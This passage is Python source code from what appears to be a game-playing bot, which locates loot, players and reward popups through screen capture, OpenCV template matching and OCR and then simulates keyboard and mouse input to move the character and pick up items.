# print("relx, rely, w, h: {},{},{},{}".format(
# relx, rely, wincap.w, wincap.h))
ratx = relx/(wincap.w * scaling)
raty = rely/(wincap.h * scaling)
return ratx, raty
def convert_ratio_to_click(ratx, raty, gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename)
relx = int(ratx * wincap.w)
rely = int(raty * wincap.h)
truex = int((relx + wincap.window_rect[0]))
truey = int((rely + wincap.window_rect[1]))
return truex, truey
def convert_true_to_window(gamename, truex, truey):
scaling = BotUtils.get_monitor_scaling()
wincap = WindowCapture(gamename)
relx = (truex/scaling) - wincap.window_rect[0]
rely = (truey/scaling) - wincap.window_rect[1]
return relx, rely
def convert_window_to_true(gamename, relx, rely):
wincap = WindowCapture(gamename)
truex = int(relx + wincap.window_rect[0])
truey = int(rely + wincap.window_rect[1])
return truex, truey
def find_other_player(gamename, all=False):
othr_plyr_vision = Vision("otherplayerinvert.jpg")
othr_plyr_wincap = WindowCapture(gamename, [1100, 50, 1260, 210])
image = othr_plyr_wincap.get_screenshot()
filter = HsvFilter(24, 194, 205, 31, 255, 255, 0, 0, 0, 0)
image = cv2.blur(image, (4, 4))
image = BotUtils.filter_blackwhite_invert(filter, image)
rectangles = othr_plyr_vision.find(
image, threshold=0.61, epsilon=0.5)
points = othr_plyr_vision.get_click_points(rectangles)
if len(points) >= 1:
if not all:
relx = points[0][0] - 0
rely = 0 - points[0][1]
return relx, rely
else:
return points
return False
def find_enemy(gamename, all=False):
othr_plyr_vision = Vision("otherplayerinvert.jpg")
othr_plyr_wincap = WindowCapture(gamename, [1100, 50, 1260, 210])
image = othr_plyr_wincap.get_screenshot()
filter = HsvFilter(0, 198, 141, 8, 255, 255, 0, 0, 0, 0)
image = cv2.blur(image, (4, 4))
image = BotUtils.filter_blackwhite_invert(filter, image)
rectangles = othr_plyr_vision.find(
image, threshold=0.41, epsilon=0.5)
points = othr_plyr_vision.get_click_points(rectangles)
if len(points) >= 1:
if not all:
relx = points[0][0] - 0
rely = 0 - points[0][1]
return relx, rely
else:
return points
return False
def find_midlevel_event(rect=False, gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
if not rect:
rect = [1100, 50, 1260, 210]
filter = HsvFilter(76, 247, 170, 100, 255, 255, 0, 0, 0, 0)
vision = Vision("otherplayerinvert.jpg")
wincap = WindowCapture(gamename, rect)
image = wincap.get_screenshot()
image = cv2.blur(image, (4, 4))
image = BotUtils.filter_blackwhite_invert(filter, image)
rectangles = vision.find(
image, threshold=0.61, epsilon=0.5)
points = vision.get_click_points(rectangles)
if len(points) >= 1:
return points[0][0], points[0][1]
return False, False
def stop_movement(follower=False):
if follower:
follower.pressed_keys = []
KEYS = {
'left': 37,
'up': 38,
'right': 39,
'down': 40
}
for key in ["up", "down", "left", "right"]:
# result = ctypes.windll.user32.GetKeyState(KEYS[key])
# if result != 0 and result != 1:
CustomInput.release_key(CustomInput.key_map[key], key)
def check_up_down_pressed():
result1 = ctypes.windll.user32.GetKeyState(38)
if result1 not in [0, 1]:
result2 = ctypes.windll.user32.GetKeyState(40)
if result2 not in [0, 1]:
return True
return False
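# Routines that detect loot name tags on screen (template matching plus OCR)
# and steer the character over to pick them up with the "x" prompt.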
class Looting:
def loot_current_room(gamename, player_name, search_points=False):
# Start by picking up loot already in range
BotUtils.close_map_and_menu(gamename)
Looting.grab_nearby_loot(gamename)
# Then try grabbing all visible far loot
Looting.grab_all_visible_loot(gamename, player_name)
# Then once that is exhausted cycle through the searchpoints
if search_points:
for point in search_points:
x, y, first_dir = point
BotUtils.move_to(gamename, x, y, yfirst=first_dir == "y")
Looting.grab_nearby_loot(gamename)
BotUtils.close_map_and_menu(gamename)
Looting.grab_all_visible_loot(gamename, player_name)
def grab_nearby_loot(gamename):
count = 0
while BotUtils.detect_xprompt(gamename):
if count > 12:
break
pydirectinput.press("x")
count += 1
time.sleep(0.09)
CustomInput.press_key(CustomInput.key_map["right"], "right")
CustomInput.release_key(CustomInput.key_map["right"], "right")
def grab_all_visible_loot(gamename, player_name=False):
start_time = time.time()
while True:
if time.time() - start_time > 20:
break
outcome = Looting.try_find_and_grab_loot(
gamename, player_name)
if outcome == "noloot":
break
elif outcome == "noplayer":
pydirectinput.press("right")
outcome = Looting.try_find_and_grab_loot(
gamename, player_name)
if outcome == "noplayer":
break
elif outcome == "falsepos":
break
elif outcome == True:
count = 0
while BotUtils.detect_xprompt(gamename):
if count > 12:
break
pydirectinput.press("x")
count += 1
time.sleep(0.09)
def grab_all_visible_lootv2(gamename=False, player_name=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
start_time = time.time()
while True:
if time.time() - start_time > 20:
break
outcome = Looting.try_find_and_grab_lootv2(
gamename, player_name)
BotUtils.stop_movement()
if outcome == "noloot":
break
elif outcome == "noplayer":
pydirectinput.press("right")
outcome = Looting.try_find_and_grab_lootv2(
gamename, player_name)
if outcome == "noplayer":
break
elif outcome == "falsepos":
break
elif outcome == True:
count = 0
while BotUtils.detect_xprompt(gamename):
if count > 12:
break
pydirectinput.press("x")
count += 1
time.sleep(0.23)
if Looting.check_for_nearby_obscured_loot(gamename):
Looting.grab_obscured_loot(gamename)
def grab_obscured_loot(gamename):
CustomInput.press_key(CustomInput.key_map["up"], "up")
start = time.time()
check_again = False
while not BotUtils.detect_xprompt(gamename):
time.sleep(0.003)
if time.time() - start > 0.5:
check_again = True
break
CustomInput.release_key(CustomInput.key_map["up"], "up")
count = 0
while BotUtils.detect_xprompt(gamename):
if count > 12:
break
pydirectinput.press("x")
count += 1
time.sleep(0.23)
if check_again:
Looting.grab_all_visible_lootv2(gamename)
def check_for_loot(gamename):
# This will be a lightweight check for any positive loot ident
# Meant to be used when moving and normal looting has ceased
# i.e. opportunistic looting
data = Looting.grab_farloot_locations(
gamename, return_image=True)
if not data:
return False
else:
loot_list, image, xoff, yoff = data
confirmed = False
try:
for _, coords in enumerate(loot_list):
x, y = coords
x -= xoff
y -= yoff
rgb = image[y-22:y+22, x-75:x+75]
filter = HsvFilter(0, 0, 131, 151, 255, 255, 0, 0, 0, 0)
rgb = BotUtils.apply_hsv_filter(rgb, filter)
tess_config = '--psm 7 --oem 3 -c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
if len(result) > 3:
return True
except:
return False
if not confirmed:
return False
def check_for_lootv2(gamename=False):
        # Improved version of the original check_for_loot function
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
if Looting.check_for_nearby_obscured_loot(gamename):
return True
else:
result = Looting.grab_farloot_locationsv2(gamename)
if not result:
return False
return True
def grab_farloot_locationsv3(gamename=False, rect=False):
        # Slower version of grab_farloot_locationsv2
        # Checks for the signature edges of the loot tag
        # Useful for verification as it is far less prone to false positives
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
vision = Vision("lootside2.jpg")
if not rect:
rect = [5, 80, 1273, 776]
wincap = WindowCapture(gamename, rect)
screenshot = wincap.get_screenshot()
original_image = screenshot
rectangles = vision.find(
original_image, threshold=0.81, epsilon=0.5)
if len(rectangles) < 1:
# Need to check other side
vision = Vision("lootside.jpg")
wincap = WindowCapture(gamename, rect)
screenshot = wincap.get_screenshot()
original_image = screenshot
rectangles = vision.find(
original_image, threshold=0.81, epsilon=0.5)
if len(rectangles) < 1:
return False
else:
points = []
for (x, y, w, h) in rectangles:
x += rect[0]
y += rect[1]
center_x = x + int(w/2) + 81
center_y = y + int(h/2)
points.append((center_x, center_y))
return points
else:
points = []
for (x, y, w, h) in rectangles:
x += rect[0]
y += rect[1]
center_x = x + int(w/2) - 81
center_y = y + int(h/2)
points.append((center_x, center_y))
return points
def check_for_nearby_obscured_loot(gamename):
# This checks for loot which wouldn't be detected by the normal function
        # which is typically loot sitting directly behind the player's name tag
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
result = Looting.grab_farloot_locationsv3(
gamename, [510, 349, 775, 500])
if not result:
return False
return True
def grab_farloot_locationsv2(gamename=False, rect=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
if not rect:
rect1 = [5, 80, 1273, 776]
wincap = WindowCapture(gamename, rect1)
else:
wincap = WindowCapture(gamename, rect)
vision = Vision("doublelootline.jpg")
screenshot = wincap.get_screenshot()
original_image = cv2.blur(screenshot, (80, 1))
lootbox_thresh1 = cv2.inRange(original_image, np.array(
[0, 19, 30]), np.array([1, 20, 37]))
lootbox_thresh2 = cv2.inRange(original_image, np.array(
[5, 19, 27]), np.array([9, 23, 31]))
combined_mask = lootbox_thresh2 + lootbox_thresh1
combined_mask_inv = 255 - combined_mask
combined_mask_rgb = cv2.cvtColor(combined_mask_inv, cv2.COLOR_GRAY2BGR)
final = cv2.max(original_image, combined_mask_rgb)
rectangles = vision.find(
final, threshold=0.87, epsilon=0.5)
if len(rectangles) < 1:
return False
points = []
for (x, y, w, h) in rectangles:
# Account for the rect
if rect:
# Account for the rect
x += rect[0]
y += rect[1]
else:
x += rect1[0]
y += rect1[1]
center_x = x + int(w/2)
center_y = y + int(h/2)
points.append((center_x, center_y))
return points
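    # Walks diagonally towards a detected loot tag, re-detecting it each frame
    # to estimate movement speed and remaining travel time, and falls back to a
    # short up/down seek if the pickup prompt never appears.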
def move_loot_diagonal(true_coords, relcoords, rect=False, gamename=False, seek=True):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
truex, truey = true_coords
lastx, lasty = true_coords
relx, rely = relcoords
# Calculate roughly how long expect to travel
expect_x = abs(relx/300)
expect_y = abs(rely/450)
# Then figure out which directions need to travel and how long
mult = 0.707
if relx > 0:
keyx = "left"
#CustomInput.press_key(CustomInput.key_map["left"], "left")
timeleftx = float("{:.4f}".format(abs(expect_x*mult)))
elif relx < 0:
keyx = "right"
#CustomInput.press_key(CustomInput.key_map["right"], "right")
timeleftx = float("{:.4f}".format(abs(expect_x*mult)))
else:
keyx = "right"
timeleftx = 0
mult = 1
if rely > 0:
keyy = "down"
#CustomInput.press_key(CustomInput.key_map["down"], "down")
timelefty = float("{:.4f}".format(abs(expect_y*mult)))
elif rely < 0:
keyy = "up"
#CustomInput.press_key(CustomInput.key_map["up"], "up")
timelefty = float("{:.4f}".format(abs(expect_y*mult)))
else:
keyy = "up"
timelefty = 0
if relx != 0:
timeleftx = float("{:.4f}".format(abs(expect_x)))
else:
return False
# Then figure out roughly which direction will finish first
closer = min([timeleftx, timelefty])
further = max([timeleftx, timelefty])
# first_key = [keyx, keyy][[timeleftx, timelefty].index(closer)]
second_key = [keyx, keyy][[timeleftx, timelefty].index(further)]
if closer < 0.05:
# If both tiny then return false
if further < 0.05:
# print("Both were very close")
BotUtils.stop_movement()
return False
# Otherwise need to just travel in second direction
# Effectively just using the old straightline method
# Do this to make it clear which direction being sorted
require_seek = False
if further == timeleftx:
# print("Travelled in x dir only")
CustomInput.press_key(
CustomInput.key_map[second_key], second_key)
last_loop = time.time()
total_frames = 0
avg_x_speed = 100
time_remaining = further
last_detect = time.time()
zero_speed_framesx = 0
start_time = time.time()
while not BotUtils.detect_xprompt(gamename):
if time.time() - start_time > 5:
BotUtils.stop_movement()
require_seek = True
break
time.sleep(0.003)
loop_time = time.time() - last_loop
last_loop = time.time()
try:
newx, newy = Looting.grab_farloot_locationsv2(gamename, rect)[
0]
last_detect = time.time()
total_frames += 1
movementx = lastx - newx
speedx = movementx/loop_time
totalx = truex - newx
percentx = abs(totalx)/abs(relx)
if percentx > 1:
# print("Percent x was {}".format(percentx))
BotUtils.stop_movement()
require_seek = True
break
if movementx == 0:
zero_speed_framesx += 1
if zero_speed_framesx > 8:
BotUtils.stop_movement()
require_seek = True
elif total_frames == 2:
zero_speed_framesx = 0
if speedx != 0:
avg_x_speed = speedx
else:
total_frames -= 1
else:
zero_speed_framesx = 0
avg_x_speed = (
total_frames*avg_x_speed+speedx)/(total_frames+1)
time_remaining = abs(
(relx - relx*percentx)/avg_x_speed)
rect = [newx-100, newy-30, newx+100, newy+30]
lastx = newx
# print("successfully looping through x-dir only")
except:
time_remaining -= loop_time
if time_remaining < 0:
BotUtils.stop_movement()
require_seek = True
if time.time() - last_detect > 0.5:
# Release all keys
BotUtils.stop_movement()
return False
total_frames = 0
# Alternatively try handle the y case only
else:
# print("Travelled in y dir only")
CustomInput.press_key(
CustomInput.key_map[second_key], second_key)
last_loop = time.time()
total_frames = 0
avg_y_speed = 100
time_remaining = further
last_detect = time.time()
zero_speed_framesy = 0
start_time = time.time()
while not BotUtils.detect_xprompt(gamename):
if time.time() - start_time > 5:
BotUtils.stop_movement()
require_seek = True
break
# print("looping through y-dir only")
if BotUtils.check_up_down_pressed():
# print("Both keys pressed down #2")
CustomInput.release_key(
CustomInput.key_map["down"], "down")
time.sleep(0.003)
loop_time = time.time() - last_loop
last_loop = time.time()
try:
newx, newy = Looting.grab_farloot_locationsv2(gamename, rect)[
0]
last_detect = time.time()
total_frames += 1
movementy = lasty - newy
speedy = movementy/loop_time
totaly = truey - newy
percenty = abs(totaly)/abs(rely)
if percenty > 1:
BotUtils.stop_movement()
require_seek = True
break
if movementy == 0:
zero_speed_framesy += 1
if zero_speed_framesy > 8:
BotUtils.stop_movement()
require_seek = True
elif total_frames == 2:
zero_speed_framesy = 0
if speedy != 0:
                                avg_y_speed = speedy
else:
total_frames -= 1
else:
zero_speed_framesy = 0
avg_y_speed = (
total_frames*avg_y_speed+speedy)/(total_frames+1)
time_remaining = abs(
(rely - rely*percenty)/avg_y_speed)
rect = [newx-100, newy-30, newx+100, newy+30]
lasty = newy
except:
time_remaining -= loop_time
if time_remaining < 0:
BotUtils.stop_movement()
require_seek = True
if time.time() - last_detect > 0.5:
# Release all keys
BotUtils.stop_movement()
return False
total_frames = 0
# Finally if can't find it then search in both directions for y
if require_seek:
# print("A seek was required")
if not seek:
BotUtils.stop_movement()
return False
# Need to move up and down for 0.5sec each way checking for loot
start_time = time.time()
keyy = "up"
CustomInput.press_key(CustomInput.key_map[keyy], keyy)
while not BotUtils.detect_xprompt(gamename):
time.sleep(0.003)
if time.time() - start_time > 0.4:
break
CustomInput.release_key(CustomInput.key_map[keyy], keyy)
if not BotUtils.detect_xprompt(gamename):
# Then move in opposite direction
start_time = time.time()
keyy = "down"
CustomInput.press_key(CustomInput.key_map[keyy], keyy)
while not BotUtils.detect_xprompt(gamename):
time.sleep(0.003)
if time.time() - start_time > 0.8:
break
CustomInput.release_key(CustomInput.key_map[keyy], keyy)
# Then need to check no keys are still pressed again
BotUtils.stop_movement()
if BotUtils.detect_xprompt(gamename):
# print("Detected xprompt, pressed x")
pydirectinput.press("x")
return True
else:
# print("This is a 2-direction job")
# Need to start moving in the right direction
CustomInput.press_key(CustomInput.key_map[keyx], keyx)
CustomInput.press_key(CustomInput.key_map[keyy], keyy)
time_remaining = 0.3
avg_x_speed, avg_y_speed = [200, 200]
zero_speed_framesx = 0
zero_speed_framesy = 0
xfinished = False
total_frames = 0
y_stuck = False
require_seek = False
last_loop = time.time()
last_detect = time.time()
start_time = time.time()
while time_remaining > 0:
if time.time() - start_time > 5:
# BotUtils.stop_movement()
require_seek = True
break
if BotUtils.check_up_down_pressed():
# print("Both keys pressed down #3")
CustomInput.release_key(
CustomInput.key_map["down"], "down")
time.sleep(0.002)
if BotUtils.detect_xprompt(gamename):
break
loop_time = time.time() - last_loop
last_loop = time.time()
last_detect = time.time()
try:
total_frames += 1
newx, newy = Looting.grab_farloot_locationsv2(gamename, rect)[
0]
if not xfinished:
movementx = lastx - newx
# print("movementx = {}px".format(movementx))
speedx = movementx/loop_time
totalx = truex - newx
percentx = abs(totalx)/abs(relx)
if movementx == 0:
zero_speed_framesx += 1
# If too many zero speed frames, clearly stuck
if zero_speed_framesx >= 8:
CustomInput.release_key(
CustomInput.key_map[keyx], keyx)
xfinished = True
else:
zero_speed_framesx = 0
if percentx > 1:
xfinished = True
CustomInput.release_key(
CustomInput.key_map[keyx], keyx)
movementy = lasty - newy
if movementy == 0:
zero_speed_framesy += 1
# If too many zero speed frames, clearly stuck
if zero_speed_framesy >= 8:
CustomInput.release_key(
CustomInput.key_map[keyy], keyy)
y_stuck = True
require_seek = True
speedy = movementy/loop_time
totaly = truey - newy
percenty = abs(totaly)/abs(rely)
if y_stuck:
pass
elif percenty > 1 and xfinished:
require_seek = True
CustomInput.release_key(
CustomInput.key_map[keyy], keyy)
break
elif percenty > 1:
CustomInput.release_key(
CustomInput.key_map[keyy], keyy)
# And then update the ETA's based on speed
if not xfinished:
if total_frames > 1 and total_frames < 10:
if movementx == 0:
pass
elif total_frames == 2:
if speedx != 0:
avg_x_speed = speedx
else:
total_frames -= 1
else:
avg_x_speed = (
total_frames*avg_x_speed+speedx)/(total_frames+1)
x_remaining = abs((relx - relx * percentx)/avg_x_speed)
if not percenty > 1 or y_stuck:
if total_frames > 1 and total_frames < 10:
if movementy == 0:
pass
elif total_frames == 2:
if speedy != 0:
avg_y_speed = speedy
else:
total_frames -= 1
else:
avg_y_speed = (
total_frames*avg_y_speed+speedy)/(total_frames+1)
y_remaining = abs((rely - rely*percenty)/avg_y_speed)
else:
y_remaining = 0
time_remaining = max([x_remaining, y_remaining])
# And finally choose the next rectangle
rect = [newx-100, newy-30, newx+100, newy+30]
lastx = newx
lasty = newy
# print(speedx)
except:
time_remaining -= loop_time
if time_remaining < 0:
BotUtils.stop_movement()
return False
if time.time() - last_detect > 0.5:
# Release all keys
BotUtils.stop_movement()
return False
total_frames = 0
# Then need to check no keys left pressed
BotUtils.stop_movement()
# Then need to seek out loot if flag set
if require_seek:
# print("Required seek #2")
if not seek:
BotUtils.stop_movement()
return False
# Need to move up and down for 0.5sec each way checking for loot
start_time = time.time()
keyy = "up"
CustomInput.press_key(CustomInput.key_map[keyy], keyy)
while not BotUtils.detect_xprompt(gamename):
time.sleep(0.003)
if time.time() - start_time > 0.4:
break
CustomInput.release_key(CustomInput.key_map[keyy], keyy)
# Then move in opposite direction
if not BotUtils.detect_xprompt(gamename):
# Then move in opposite direction
start_time = time.time()
keyy = "down"
CustomInput.press_key(CustomInput.key_map[keyy], keyy)
while not BotUtils.detect_xprompt(gamename):
time.sleep(0.003)
if time.time() - start_time > 0.8:
break
CustomInput.release_key(CustomInput.key_map[keyy], keyy)
# Then need to check no keys are still pressed again
BotUtils.stop_movement()
if BotUtils.detect_xprompt(gamename):
# print("Detected xprompt #2")
BotUtils.stop_movement()
pydirectinput.press("x")
return True
BotUtils.stop_movement()
return False
def try_find_and_grab_lootv2(gamename=False, player_name=False, loot_lowest=True, allow_noplyr=True):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
# First need to close anything that might be in the way
BotUtils.close_map_and_menu(gamename)
# Then grab loot locations
loot_list = Looting.grab_farloot_locationsv2(gamename)
if not loot_list:
return "noloot"
# Then look for player
if player_name:
playerx, playery = BotUtils.grab_character_location(
player_name, gamename)
# If didn't find player then try once more
if not playerx:
playerx, playery = BotUtils.grab_character_location(
player_name, gamename)
if not playerx:
if not allow_noplyr:
return "noplayer"
else:
playerx, playery = [641, 387]
# Otherwise assume a standard player position
else:
playerx, playery = [641, 387]
        # Then decide whether to loot the nearest item or the lowest one on screen.
        # The first is faster; the second is less likely to miss loot
        # by walking out of the field of view
if not loot_lowest:
# Then convert lootlist to rel_pos list
relatives = BotUtils.convert_list_to_rel(
loot_list, playerx, playery, 150)
            # Grab the indexes in ascending order of closeness
order = BotUtils.grab_order_closeness(relatives)
# Then reorder the lootlist to match
loot_list = [x for _, x in sorted(zip(order, loot_list))]
else:
# Grab the indexes in ascending order of distance from
# bottom of the screen
# print(loot_list)
loot_list.sort(key=lambda x: x[1], reverse=True)
# order = BotUtils.grab_order_lowest_y(loot_list)
# Then reorder the lootlist to match
# loot_list = [x for _, x in sorted(zip(order, loot_list))]
# print(loot_list)
true_coords = [loot_list[0][0], loot_list[0][1]]
# Now calculate relative loot position
relx = playerx - loot_list[0][0]
rely = loot_list[0][1] - playery - 150
# Grab the small rect for speed tracking
rect = [loot_list[0][0]-90, loot_list[0][1] -
30, loot_list[0][0]+90, loot_list[0][1]+30]
# Then send to dedicated function for diagonal looting run
return Looting.move_loot_diagonal(true_coords, [relx, rely], rect, gamename, True)
def try_find_and_grab_loot(gamename, player_name=False, loot_lowest=True, printout=False):
# First need to close anything that might be in the way
BotUtils.close_map_and_menu(gamename)
# Then grab loot locations
loot_list = Looting.grab_farloot_locations(gamename)
if not loot_list:
# print("No loot found")
return "noloot"
# else:
# print("Loot found")
if player_name:
playerx, playery = BotUtils.grab_character_location(
player_name, gamename)
# If didn't find player then try once more
if not playerx:
playerx, playery = BotUtils.grab_character_location(
player_name, gamename)
if not playerx:
return "noplayer"
else:
playerx, playery = [641, 387]
# print(loot_list)
        # If always looting the nearest item first, despite the extra CPU cost
if not loot_lowest:
# Then convert lootlist to rel_pos list
relatives = BotUtils.convert_list_to_rel(
loot_list, playerx, playery, 275)
            # Grab the indexes in ascending order of closeness
order = BotUtils.grab_order_closeness(relatives)
# Then reorder the lootlist to match
loot_list = [x for _, x in sorted(zip(order, loot_list))]
        # Otherwise loot from the bottom of the screen towards the top.
        # Typically better, since all loot is then seen in the y direction,
        # though loot in the x direction can be missed
else:
# Grab the indexes in ascending order of distance from
# bottom of the screen
order = BotUtils.grab_order_lowest_y(loot_list)
# Then reorder the lootlist to match
loot_list = [x for _, x in sorted(zip(order, loot_list))]
# print(loot_list)
confirmed = False
for index, coords in enumerate(loot_list):
# print("Found a possible match")
x, y = coords
wincap = WindowCapture(gamename, [x-70, y, x+70, y+40])
rgb = wincap.get_screenshot()
filter = HsvFilter(0, 0, 131, 151, 255, 255, 0, 0, 0, 0)
rgb = BotUtils.apply_hsv_filter(rgb, filter)
cv2.imwrite("testytest.jpg", rgb)
tess_config = '--psm 8 --oem 3 -c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
if len(result.replace(" ", "")) > 3:
if printout:
print(result)
confirmed = loot_list[index]
print("First method, {}".format(result.replace(" ", "")))
cv2.imwrite("C:\\Games\\first" +
str(random.randint(0, 10000))+".jpg", rgb)
break
else:
wincap = WindowCapture(gamename, [x-75, y-10, x+75, y+50])
rgb = wincap.get_screenshot()
filter = HsvFilter(0, 0, 131, 151, 255, 255, 0, 0, 0, 0)
rgb = BotUtils.apply_hsv_filter(rgb, filter)
# cv2.imwrite("testytest.jpg", rgb)
tess_config = '--psm 6 --oem 3 -c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
if len(result.replace(" ", "").replace("\n", "")) > 6:
confirmed = loot_list[index]
print("Second method, {}".format(
result.replace(" ", "").replace("\n", "")))
cv2.imwrite("C:\\Games\\second" +
str(random.randint(0, 10000))+".jpg", rgb)
break
if not confirmed:
# print("Lootname not confirmed or detected")
return "noloot"
# print(confirmed)
relx = playerx - confirmed[0]
rely = confirmed[1] - playery - 150
# print("relx:{}, rely:{}".format(-relx, -rely))
rect = [confirmed[0]-100, confirmed[1] -
30, confirmed[0]+100, confirmed[1]+30]
BotUtils.move_towards(relx, "x")
loop_time = time.time()
time_remaining = 0.1
time.sleep(0.01)
zero_speed_frames = 0
lastx = 89271
while time_remaining > 0:
# print("Looping during x travel")
time.sleep(0.003)
if BotUtils.detect_xprompt(gamename):
break
try:
newx, newy = Looting.grab_farloot_locations(gamename, rect)[
0]
time_taken = time.time() - loop_time
movementx = confirmed[0] - newx
speed = movementx/time_taken
# print(speed)
if newx == lastx:
zero_speed_frames += 1
if zero_speed_frames >= 8:
break
elif speed != 0:
time_remaining = abs(
relx/speed) - time_taken
rect = [newx-100, newy-30, newx+100, newy+30]
lastx = newx
except:
print("Can no longer detect loot")
try:
if time_remaining < 3:
time.sleep(time_remaining)
else:
time.sleep(abs(relx/100))
break
except:
return False
for key in ["left", "right"]:
CustomInput.release_key(CustomInput.key_map[key], key)
time.sleep(0.1)
for key in ["left", "right"]:
CustomInput.release_key(CustomInput.key_map[key], key)
BotUtils.move_towards(rely, "y")
start_time = time.time()
if rely < 0:
expected_time = abs(rely/300)
else:
expected_time = abs(rely/380)
# print("rely:{}px, travel time: {}s".format(rely, expected_time))
while not BotUtils.detect_xprompt(gamename):
time.sleep(0.005)
# After moving in opposite direction
if time.time() - start_time > 10:
                # If the opposite direction has also been tried for the same time with no result
if time.time() - start_time > 10 + 2*(1 + expected_time):
for key in ["up", "down"]:
CustomInput.release_key(CustomInput.key_map[key], key)
# Return falsepos so that it will ignore this detection
return "falsepos"
            # If no result after the expected travel time (plus a 1 second buffer)
elif time.time() - start_time > 1 + expected_time:
# Try moving in the opposite direction
for key in ["up", "down"]:
CustomInput.release_key(CustomInput.key_map[key], key)
BotUtils.move_towards(-1*rely, "y")
start_time -= 8.5
# print("Expected:{}s, actual:{}s".format(
# expected_time, time.time()-start_time))
for key in ["up", "down"]:
CustomInput.release_key(CustomInput.key_map[key], key)
pydirectinput.press("x")
return True
def grab_farloot_locations(gamename=False, rect=False, return_image=False):
if gamename:
if not rect:
rect1 = [100, 160, 1092, 695]
wincap = WindowCapture(gamename, rect1)
else:
wincap = WindowCapture(gamename, rect)
original_image = wincap.get_screenshot()
else:
original_image = cv2.imread(os.path.dirname(
os.path.abspath(__file__)) + "/testimages/lootscene.jpg")
filter = HsvFilter(15, 180, 0, 20, 255, 63, 0, 0, 0, 0)
output_image = BotUtils.filter_blackwhite_invert(
filter, original_image, True, 0, 180)
# cv2.imwrite("testytest2.jpg", output_image)
# cv2.imwrite("C:\\Games\\" +
# str(random.randint(0, 10000))+".jpg", output_image)
output_image = cv2.blur(output_image, (8, 1))
output_image = cv2.blur(output_image, (8, 1))
output_image = cv2.blur(output_image, (8, 1))
_, thresh = cv2.threshold(output_image, 127, 255, 0)
contours, _ = cv2.findContours(
thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
if len(contours) < 2:
return False
contours.pop(0)
rectangles = []
for contour in contours:
(x, y), _ = cv2.minEnclosingCircle(contour)
rectangles.append([x-50, y, 100, 5])
rectangles.append([x-50, y, 100, 5])
rectangles, _ = cv2.groupRectangles(
rectangles, groupThreshold=1, eps=0.9)
if len(rectangles) < 1:
return False
points = []
for (x, y, w, h) in rectangles:
# Account for the rect
if rect:
# Account for the rect
x += rect[0]
y += rect[1]
else:
                # offset back into full-window coordinates (origin of the default rect1)
                x += 100
                y += 160
center_x = x + int(w/2)
center_y = y + int(h/2)
points.append((center_x, center_y))
if return_image:
if rect:
return points, original_image, rect[0], rect[1]
else:
return points, original_image, rect1[0], rect1[1]
return points
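# Pixel-probe detectors for the various in-game popups (reward choice, end of
# level chest, resurrect prompt, etc.) plus a helper that clicks a random reward.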
class Events:
def choose_random_reward(gamename):
wincap = WindowCapture(gamename)
posx = wincap.window_rect[0] + (460+(180*random.randint(0, 2)))
posy = wincap.window_rect[1] + (200+(132*random.randint(0, 3)))
pydirectinput.click(int(posx), int(posy))
time.sleep(0.1)
# Now accept the reward
pydirectinput.click(
wincap.window_rect[0]+750, wincap.window_rect[1]+720)
# And then perform clicks a second time just in case
time.sleep(0.1)
pydirectinput.click(int(posx), int(posy))
time.sleep(0.1)
pydirectinput.click(
wincap.window_rect[0]+750, wincap.window_rect[1]+720)
def detect_reward_choice_open(gamename):
wincap = WindowCapture(gamename, [503, 90, 535, 92])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
if a + d > 400:
if b + e > 500:
if c + f < 105:
return True
return False
def detect_move_reward_screen(gamename):
wincap = WindowCapture(gamename, [581, 270, 593, 272])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
if a + d > 360 and a + d < 400:
if b + e > 360 and b + e < 400:
if c + f < 10:
return True
return False
def detect_endlevel_chest(gamename):
wincap = WindowCapture(gamename, [454, 250, 525, 252])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
if a + d < 50:
if b + e > 480:
if c + f > 290 and c+f < 320:
return True
return False
def detect_endlevel_bonus_area(gamename):
wincap = WindowCapture(gamename, [503, 487, 514, 589])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
if a + d > 400:
if b + e > 400:
if c + f > 400:
return True
return False
def detect_in_dungeon(wincap=False):
if not wincap:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, [1090, 331, 1092, 353])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[-1][0]]
if d < 20:
            if 400 < a + b + e < 500:
if c + f > 480:
return True
return False
def detect_go(gamename):
wincap = WindowCapture(gamename, [623, 247, 628, 249])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
if a < 30:
if b > 240:
if c > 140:
return True
return False
def detect_one_card(gamename):
# Cards only show up once one has been picked
# Therefore need to check against bronze, gold, silver
wincap = WindowCapture(gamename, [833, 44, 835, 46])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
# Bronze
if a == 27:
if b == 48:
if c == 87:
return True
# Silver
if a == 139:
if b == 139:
if c == 139:
return True
# Gold
if a == 38:
if b == 129:
if c == 160:
return True
return False
def detect_yes_no(gamename=False):
if not gamename:
